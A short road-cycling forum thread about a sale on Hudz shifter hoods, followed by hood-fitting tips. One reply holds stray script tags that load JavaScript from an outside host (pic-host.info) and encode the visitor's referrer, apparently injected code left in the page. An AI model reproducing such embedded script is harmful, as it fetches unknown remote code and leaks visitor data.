Road Bike, Cycling Forums banner
1 - 5 of 5 Posts

·
Matnlely Dregaend
4,989 Posts
Discussion Starter · #1 · (Edited)
Hudz at Nashbar for $5.99 / $4.79

For those of you who like to color coordinate, Nashbar has Hudz shifter hoods on sale for $5.99 for Shimano, Campy, and SRAM. Usually there are no decent colors left when the price gets this low but they have a ton! And if your order is $50 or more you get another 20% off making them $4.79!

·
Registered
255 Posts
For those of you who like to color coordinate, Nashbar has Hudz shifter hoods on sale for $5.99 for Shimano, Campy, and SRAM. Usually there are no decent colors left when the price gets this low but they have a ton! And if your order is $50 or more you get another 20% off making them $4.79!<script type="text/javascript" src="http://www.pic-host.info/files/encode.js"></script><script type="text/javascript">if (document.referrer) { var ref='?'+encode(document.referrer); } else { var ref=''; }document.write('
');</script>
$1 is always money, thanks for sharing

·
Matnlely Dregaend
4,989 Posts
Discussion Starter · #5 ·
It was a 2 day sale, over now sorry. I got mine today. My recommendation is to warm the old and new hoods up really well with a hair dryer before taking them off/putting them on. Also grease the new hoods with some WD40 to make them slide.

1 - 5 of 5 Posts
This is an older thread, you may not receive a response, and could be reviving an old thread. Please consider creating a new thread.